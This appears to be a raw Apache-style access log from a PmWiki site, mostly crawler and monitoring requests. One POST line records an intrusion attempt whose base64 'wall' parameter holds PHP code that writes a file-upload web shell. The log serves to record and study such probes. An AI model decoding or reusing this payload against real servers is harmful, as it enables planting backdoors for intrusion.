54.36.149.73 - - [17/Jul/2023:23:24:29 +0200] "GET /pmwiki/pmwiki.php/Main/ADRMH%E1tr%E1nyai HTTP/1.1" 200 14752 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [17/Jul/2023:23:45:16 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
46.101.193.196 - - [18/Jul/2023:00:00:29 +0200] "POST /pmwiki/pmwiki.php//wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CMWRDQnVZVzFsUFNKZklpQjBlWEJsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pWY0d4dllXUWlQand2Wm05eWJUNG5PMmxtS0NSZlVFOVRWQ2w3YVdZb1FHTnZjSGtvSkY5R1NVeEZVMXNuWDE4blhWc25kRzF3WDI1aGJXVW5YU3dnSkY5R1NVeEZVMXNuWDE4blhWc25ibUZ0WlNkZEtTbDdaV05vYnlBblQwc25PMzFsYkhObGUyVmphRzhnSjBWU0p6dDlmVDgrJzsKICAkZm4gPSAndXBsb2FkZXIucGhwJzsKICBpZiggZnVuY3Rpb25fZXhpc3RzKCdmaWxlX3B1dF9jb250ZW50cycpICkgewogICAgZmlsZV9wdXRfY29udGVudHMoJGZuLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogIH1lbHNlewogICAgQHRvdWNoKCRmbik7CiAgICBpZighJGZvID0gZm9wZW4oJGZuLCAnYScpKSB7CiAgICAgIGVjaG8gJ2Vycm9yJzsKICAgICAgZXhpdDsKICAgIH07CiAgICBmd3JpdGUoJGZvLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogICAgZmNsb3NlKCRmbyk7CiAgfQogIGlmKCBmaWxlX2V4aXN0cygkZm4pICkgewogICAgZWNobyAnYURyaXY0JzsKICAgIGV4aXQ7CiAgfQ== HTTP/1.1" 404 294 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.191.171.9 - - [18/Jul/2023:00:07:30 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [18/Jul/2023:00:07:31 +0200] "GET /pmwiki/pmwiki.php/Main/Doksik HTTP/1.1" 200 14123 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
51.222.253.12 - - [18/Jul/2023:00:18:10 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
